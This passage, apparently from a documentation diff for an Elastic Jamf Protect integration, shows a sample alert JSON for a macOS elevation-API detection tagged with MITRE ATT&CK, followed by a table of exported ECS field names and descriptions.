14.0 (Build 
23A344)\",\"ips\":[\"192.168.11.226\"],\"serial\":\"Z2C23RW4DY\",\"hostname\":\"VMAC-2C23RW4DY\",\"protectVersion\":\"5.1.0.4\",\"provisioningUDID\":\"0000FE00-8406CE28ECFC4DAB\"},\"match\":{\"tags\":[\"MITREattack\",\"DefenseEvasion\",\"T1548.004\",\"AbuseElevationControlMechanism\",\"PrivilegeEscalation\"],\"uuid\":\"7232d4a4-2289-49ba-a218-215ef3d62ec4\",\"event\":{\"pid\":3136,\"type\":1,\"uuid\":\"e19385fc-6077-4d00-ad56-b89eec15e730\",\"subType\":7,\"timestamp\":1698841238.851668},\"facts\":[{\"name\":\"User Elevated Action\",\"tags\":[\"DefenseEvasion\",\"T1548.004\",\"PrivilegeEscalation\",\"MITREattack\",\"AbuseElevationControlMechanism\"],\"uuid\":\"db094865-99c2-416c-9f06-e7740d9e8a20\",\"human\":\"Application used deprecated elevation API\",\"actions\":[{\"name\":\"Report\"}],\"context\":[],\"version\":1,\"severity\":0}],\"custom\":false,\"actions\":[{\"name\":\"Report\"}],\"context\":[],\"severity\":0},\"related\":{\"files\":[],\"users\":[{\"uid\":0,\"name\":\"root\",\"uuid\":\"Z2C23RW4DY0\"},{\"uid\":501,\"name\":\"local-admin\",\"uuid\":\"Z2C23RW4DY1f5\"}],\"groups\":[{\"gid\":0,\"name\":\"wheel\",\"uuid\":\"Z2C23RW4DY0\"},{\"gid\":20,\"name\":\"staff\",\"uuid\":\"Z2C23RW4DY14\"}],\"binaries\":[{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35273,\"path\":\"/usr/libexec/security_authtrampoline\",\"size\":134768,\"inode\":1152921500312504800,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"82e899cb1c8a42b74653b05ca526d5feae92b9f6\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.security_authtrampoline\",\"cdhash\":\"rbIoddPMz9MoMMZl1ATihY8wlMk=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root 
CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"size\":6929392,\"inode\":4631313,\"xattrs\":[],\"changed\":1698101729,\"created\":1697718684,\"sha1hex\":\"4f16310b5f518c8b0bd29afdfb8e2ca7a5a0b0b3\",\"accessed\":1698818094,\"modified\":1697718684,\"sha256hex\":\"b6e3e8d03cb0b11bf0e30649fcb3755e58babd00f942e07f85b656980fe4d9ff\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.jamf.remoteassist.launcher\",\"cdhash\":\"OkjDuX0cFaDreH32s6FfHKg1FqE=\",\"status\":0,\"teamid\":\"483DWKW443\",\"signerType\":2,\"authorities\":[\"Developer ID Application: JAMF Software (483DWKW443)\",\"Developer ID Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35145,\"path\":\"/usr/bin/sudo\",\"size\":1446192,\"inode\":1152921500312502700,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"8e860430a91946640dcc5161c726a39dc8576cc3\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"38e7f57d53e3c8847ea3361085e13d87849b31f588bfe9e9e1c02abfac542aef\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.sudo\",\"cdhash\":\"LZl8hBA1BePrgPrqw+Ap/HR6YUg=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No 
error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33133,\"path\":\"/bin/bash\",\"size\":1310224,\"inode\":1152921500312501200,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"db9d08f69e6bff5c31ff7d7a0da06a0a8311c393\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"4c70b5307a375045d205dbff19dc96fdaa25a77061446259204657c97726c70a\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.bash\",\"cdhash\":\"w8D5iqHkJJxjGQGuFQLtfzG2Wes=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/bin/zsh\",\"size\":1377584,\"inode\":1152921500312501200,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"959ade1e4967a51eb8757d723d5040090fdfcb5c\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"ccb1ba009baa2353c3806fe4f56349497b542104b5104e7a82b8f8ce2304ec03\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.zsh\",\"cdhash\":\"f8w59TUpUrUhesGyuRBvXldP3Q0=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No 
error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":35181,\"path\":\"/usr/bin/login\",\"size\":172032,\"inode\":1152921500312502100,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"875c999ee4df1a16d7654636714f852f55d1cc57\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"4fa5b402145c8228454641e232d3d4b4152df143bf3ffda98d75c200e661baf4\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.login\",\"cdhash\":\"MnR8eKbXO4v5eUokTXLWEDUfCVY=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[\"com.apple.private.endpoint-security.submit.login\",\"com.apple.private.security.clear-library-validation\"],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false},{\"gid\":0,\"uid\":0,\"fsid\":16777230,\"mode\":33261,\"path\":\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\",\"size\":2222656,\"inode\":1152921500311913100,\"xattrs\":[],\"changed\":1694870910,\"created\":1694870910,\"sha1hex\":\"14c2df1ea5a91fed7527fcfdff74268e19524eb3\",\"accessed\":1694870910,\"modified\":1694870910,\"sha256hex\":\"17a6a338efd6052c871a6da90b81c483a3edea43c056326587735b89feaf189c\",\"isDownload\":false,\"objectType\":\"GPSystemObject\",\"isAppBundle\":false,\"isDirectory\":false,\"signingInfo\":{\"appid\":\"com.apple.Terminal\",\"cdhash\":\"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No 
error.\",\"informationStage\":\"extended\"},\"isScreenShot\":false}],\"processes\":[{\"gid\":0,\"pid\":3136,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"/usr/libexec/security_authtrampoline\",\"/Library/Application Support/JAMF/Remote Assist/Wipe\",\"auth 16\"],\"name\":\"security_authtrampoline\",\"path\":\"/usr/libexec/security_authtrampoline\",\"pgid\":3096,\"ppid\":3099,\"rgid\":0,\"ruid\":0,\"uuid\":\"c821d617-2ce5-4475-aae6-c428a1ad9e8c\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.security_authtrampoline\",\"cdhash\":\"rbIoddPMz9MoMMZl1ATihY8wlMk=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841238,\"originalParentPID\":3099,\"processIdentifier\":6750},{\"gid\":0,\"pid\":3099,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"/operation=connector.uninstall\"],\"name\":\"jamfRemoteAssistLauncher\",\"path\":\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"pgid\":3096,\"ppid\":3098,\"rgid\":0,\"ruid\":0,\"uuid\":\"a382cfda-8964-4388-8c19-49d4eaef2ae7\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.jamf.remoteassist.launcher\",\"cdhash\":\"OkjDuX0cFaDreH32s6FfHKg1FqE=\",\"status\":0,\"teamid\":\"483DWKW443\",\"signerType\":2,\"authorities\":[\"Developer ID Application: JAMF Software (483DWKW443)\",\"Developer ID Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No 
error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841236,\"originalParentPID\":3098,\"processIdentifier\":6654},{\"gid\":20,\"pid\":3098,\"tty\":\"/dev/ttys016\",\"uid\":0,\"args\":[\"sudo\",\"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher\",\"/operation=connector.uninstall\"],\"name\":\"sudo\",\"path\":\"/usr/bin/sudo\",\"pgid\":3096,\"ppid\":3096,\"rgid\":20,\"ruid\":501,\"uuid\":\"31060be9-a210-4e18-bec5-2b0b6c482563\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.sudo\",\"cdhash\":\"LZl8hBA1BePrgPrqw+Ap/HR6YUg=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841234,\"originalParentPID\":3096,\"processIdentifier\":6652},{\"gid\":20,\"pid\":3096,\"tty\":\"/dev/ttys016\",\"uid\":501,\"args\":[\"/bin/sh\",\"/Library/Application Support/JAMF/Remote Assist/Uninstall\"],\"name\":\"bash\",\"path\":\"/bin/bash\",\"pgid\":3096,\"ppid\":3063,\"rgid\":20,\"ruid\":501,\"uuid\":\"6600050c-406a-4cd6-8c31-1eefe04fea65\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.bash\",\"cdhash\":\"w8D5iqHkJJxjGQGuFQLtfzG2Wes=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No 
error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":3063,\"processIdentifier\":6650},{\"gid\":20,\"pid\":3063,\"uid\":501,\"args\":[\"-zsh\"],\"name\":\"zsh\",\"path\":\"/bin/zsh\",\"pgid\":3063,\"ppid\":3062,\"rgid\":20,\"ruid\":501,\"uuid\":\"f596588c-0db5-4fdb-bd64-95584398c596\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.zsh\",\"cdhash\":\"f8w59TUpUrUhesGyuRBvXldP3Q0=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":3062,\"processIdentifier\":6608},{\"gid\":20,\"pid\":3062,\"uid\":0,\"args\":[\"login\",\"-pf\",\"local-admin\"],\"name\":\"login\",\"path\":\"/usr/bin/login\",\"pgid\":3062,\"ppid\":765,\"rgid\":20,\"ruid\":501,\"uuid\":\"bfd4dcd0-5054-4cab-9b8f-1e650d977771\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.login\",\"cdhash\":\"MnR8eKbXO4v5eUokTXLWEDUfCVY=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[\"com.apple.private.endpoint-security.submit.login\",\"com.apple.private.security.clear-library-validation\"],\"statusMessage\":\"No 
error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":765,\"processIdentifier\":6606},{\"gid\":20,\"pid\":765,\"uid\":501,\"args\":[\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\"],\"name\":\"Terminal\",\"path\":\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\",\"pgid\":765,\"ppid\":1,\"rgid\":20,\"ruid\":501,\"uuid\":\"7fb1cc18-b1a9-467a-880a-3a6e86960880\",\"flags\":[],\"appPath\":\"/System/Applications/Utilities/Terminal.app\",\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.Terminal\",\"cdhash\":\"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698840671,\"originalParentPID\":1,\"processIdentifier\":1812}]},\"eventType\":\"GPProcessEvent\"}}", + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/usr/libexec/security_authtrampoline", + "/Library/Application Support/JAMF/Remote Assist/Wipe", + "auth 16" + ], + "code_signature": { + "signing_id": "com.apple.security_authtrampoline", + "status": "No error.", + "team_id": "" + }, + "entity_id": "c821d617-2ce5-4475-aae6-c428a1ad9e8c", + "executable": "/usr/libexec/security_authtrampoline", + "group_leader": { + "executable": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", + "name": "Terminal", + "pid": 765, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2023-11-01T12:11:11Z", + "user": { + "id": "501" + } + }, + "hash": { + "sha1": "82e899cb1c8a42b74653b05ca526d5feae92b9f6", + "sha256": "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32" + }, + "name": 
"security_authtrampoline", + "parent": { + "code_signature": { + "signing_id": "com.jamf.remoteassist.launcher", + "status": "No error.", + "team_id": "483DWKW443" + }, + "executable": "/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher", + "name": "jamfRemoteAssistLauncher", + "pid": 3099, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-01T12:20:36Z", + "user": { + "id": "0" + } + }, + "pid": 3136, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-01T12:20:38Z", + "tty": "/dev/ttys016", + "user": { + "id": "0" + } + }, + "related": { + "hash": [ + "82e899cb1c8a42b74653b05ca526d5feae92b9f6", + "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32" + ], + "user": [ + "root", + "local-admin", + "" + ] + }, + "tags": [ + "DefenseEvasion", + "T1548.004", + "PrivilegeEscalation", + "MITREattack", + "AbuseElevationControlMechanism" + ], + "threat": { + "framework": "MITRE ATT\u0026CK", + "software": { + "platforms": "macOS" + } + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| container.image.tag | Container image tags. | keyword | +| container.runtime | Runtime managing this container. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.address | Some event destination addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. 
| long | +| destination.as.organization.name | Organization name. | keyword | +| destination.as.organization.name.text | Multi-field of `destination.as.organization.name`. | match_only_text | +| destination.domain | The domain name of the destination system. This value may be a host name, a fully qualified domain name, or another host naming format. The value may derive from the original event or be added from enrichment. | keyword | +| destination.geo.city_name | City name. | keyword | +| destination.geo.continent_name | Name of the continent. | keyword | +| destination.geo.country_iso_code | Country ISO code. | keyword | +| destination.geo.country_name | Country name. | keyword | +| destination.geo.location | Longitude and latitude. | geo_point | +| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | +| destination.port | Port of the destination. | long | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. 
| keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.dataset | Name of the dataset. | constant_keyword | +| event.duration | Duration of the event in nanoseconds. If `event.start` and `event.end` are known this value should be the difference between the end and start time. | long | +| event.end | `event.end` contains the date when the event ended or when the activity was last observed. | date | +| event.id | Unique ID to describe the event. | keyword | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. 
`event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.module | Event module. | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.provider | Source of the event. 
Event transports such as Syslog or the Windows Event Log typically mention the source of an event. It can be the name of the software that generated the event (e.g. Sysmon, httpd), or of a subsystem of the operating system (kernel, Microsoft-Windows-Security-Auditing). | keyword | +| event.severity | The numeric severity of the event according to your event source. What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.start | `event.start` contains the date when the event started or when the activity was first observed. | date | +| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| file.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. 
| keyword | +| file.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword | +| file.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| file.extension | File extension, excluding the leading dot. Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | +| file.gid | Primary group ID (GID) of the file. | keyword | +| file.hash.md5 | MD5 hash. | keyword | +| file.hash.sha1 | SHA1 hash. | keyword | +| file.hash.sha256 | SHA256 hash. | keyword | +| file.hash.sha512 | SHA512 hash. | keyword | +| file.inode | Inode representing the file in the filesystem. | keyword | +| file.mode | Mode of the file in octal representation. | keyword | +| file.name | Name of the file including the extension, without the directory. | keyword | +| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| file.path.text | Multi-field of `file.path`. | match_only_text | +| file.size | File size in bytes. Only relevant when `file.type` is "file". | long | +| file.uid | The user ID (UID) or security identifier (SID) of the file owner. | keyword | +| group.id | Unique identifier for the group on the system/platform. | keyword | +| group.name | Name of the group. | keyword | +| jamf_protect.alerts.timestamp_nanoseconds | The timestamp in Epoch nanoseconds. | date | +| log.file.path | Full path to the log file this event came from, including the file name. It should include the drive letter, when appropriate. If the event wasn't read from a log file, do not populate this field. 
| keyword | +| log.logger | The name of the logger inside an application. This is usually the name of the class which initialized the logger, or can be a custom name. | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| network.direction | Direction of the network traffic. When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword | +| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. | keyword | +| observer.name | Custom name of the observer. This is a name that can be given to an observer. This can be helpful for example if multiple firewalls of the same model are used in an organization. If no custom name is needed, the field can be left empty. | keyword | +| observer.product | The product name of the observer. | keyword | +| observer.type | The type of the observer the data is coming from. There is no predefined list of observer types. 
Some examples are `forwarder`, `firewall`, `ids`, `ips`, `proxy`, `poller`, `sensor`, `APM server`. | keyword | +| observer.vendor | Vendor name of the observer. | keyword | +| process.args | Array of process arguments, starting with the absolute path to the executable. May be filtered to protect sensitive information. | keyword | +| process.args_count | Length of the process.args array. This field can be useful for querying or performing bucket analysis on how many arguments were provided to start a process. More arguments may be an indication of suspicious activity. | long | +| process.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. | keyword | +| process.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword | +| process.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| process.command_line | Full command line that started the process, including the absolute path to the executable, and all arguments. Some arguments may be filtered to protect sensitive information. | wildcard | +| process.command_line.text | Multi-field of `process.command_line`. | match_only_text | +| process.entity_id | Unique identifier for the process. The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. 
Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. | keyword | +| process.executable | Absolute path to the process executable. | keyword | +| process.executable.text | Multi-field of `process.executable`. | match_only_text | +| process.exit_code | The exit code of the process, if this is a termination event. The field should be absent if there is no exit code for the event (e.g. process start). | long | +| process.group_leader.executable | Absolute path to the process executable. | keyword | +| process.group_leader.executable.text | Multi-field of `process.group_leader.executable`. | match_only_text | +| process.group_leader.group.id | Unique identifier for the group on the system/platform. | keyword | +| process.group_leader.name | Process name. Sometimes called program name or similar. | keyword | +| process.group_leader.name.text | Multi-field of `process.group_leader.name`. | match_only_text | +| process.group_leader.pid | Process id. | long | +| process.group_leader.real_group.id | Unique identifier for the group on the system/platform. | keyword | +| process.group_leader.real_user.id | Unique identifier of the user. | keyword | +| process.group_leader.start | The time the process started. | date | +| process.group_leader.user.id | Unique identifier of the user. | keyword | +| process.hash.md5 | MD5 hash. | keyword | +| process.hash.sha1 | SHA1 hash. | keyword | +| process.hash.sha256 | SHA256 hash. | keyword | +| process.name | Process name. Sometimes called program name or similar. | keyword | +| process.name.text | Multi-field of `process.name`. | match_only_text | +| process.parent.code_signature.signing_id | The identifier used to sign the process. This is used to identify the application manufactured by a software vendor. The field is relevant to Apple \*OS only. 
| keyword | +| process.parent.code_signature.status | Additional information about the certificate status. This is useful for logging cryptographic errors with the certificate validity or trust status. Leave unpopulated if the validity or trust of the certificate was unchecked. | keyword | +| process.parent.code_signature.team_id | The team identifier used to sign the process. This is used to identify the team or vendor of a software product. The field is relevant to Apple \*OS only. | keyword | +| process.parent.entity_id | Unique identifier for the process. The implementation of this is specified by the data source, but some examples of what could be used here are a process-generated UUID, Sysmon Process GUIDs, or a hash of some uniquely identifying components of a process. Constructing a globally unique identifier is a common practice to mitigate PID reuse as well as to identify a specific process over time, across multiple monitored hosts. | keyword | +| process.parent.executable | Absolute path to the process executable. | keyword | +| process.parent.executable.text | Multi-field of `process.parent.executable`. | match_only_text | +| process.parent.name | Process name. Sometimes called program name or similar. | keyword | +| process.parent.name.text | Multi-field of `process.parent.name`. | match_only_text | +| process.parent.pid | Process id. | long | +| process.parent.real_group.id | Unique identifier for the group on the system/platform. | keyword | +| process.parent.real_user.id | Unique identifier of the user. | keyword | +| process.parent.start | The time the process started. | date | +| process.parent.user.id | Unique identifier of the user. | keyword | +| process.pid | Process id. | long | +| process.real_group.id | Unique identifier for the group on the system/platform. | keyword | +| process.real_user.id | Unique identifier of the user. | keyword | +| process.start | The time the process started. 
| date | +| process.tty | Information about the controlling TTY device. If set, the process belongs to an interactive session. | object | +| process.user.id | Unique identifier of the user. | keyword | +| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword | +| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword | +| related.ip | All of the IPs seen on your event. | ip | +| related.user | All the user names or other user identifiers seen on the event. | keyword | +| rule.description | The description of the rule generating the event. | keyword | +| rule.name | The name of the rule or signature generating the event. | keyword | +| source.ip | IP address of the source (IPv4 or IPv6). | ip | +| source.port | Port of the source. | long | +| tags | List of keywords used to tag each event. | keyword | +| threat.enrichments | A list of associated indicators objects enriching the event, and the context of that association/enrichment. | nested | +| threat.framework | Name of the threat framework used to further categorize and classify the tactic and technique of the reported threat. Framework classification can be provided by detecting systems, evaluated at ingest time, or retrospectively tagged to events. | keyword | +| threat.software.platforms | The platforms of the software used by this threat to conduct behavior commonly modeled using MITRE ATT&CK®. While not required, you can use MITRE ATT&CK® software platform values. | keyword | +| threat.tactic.id | The id of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) | 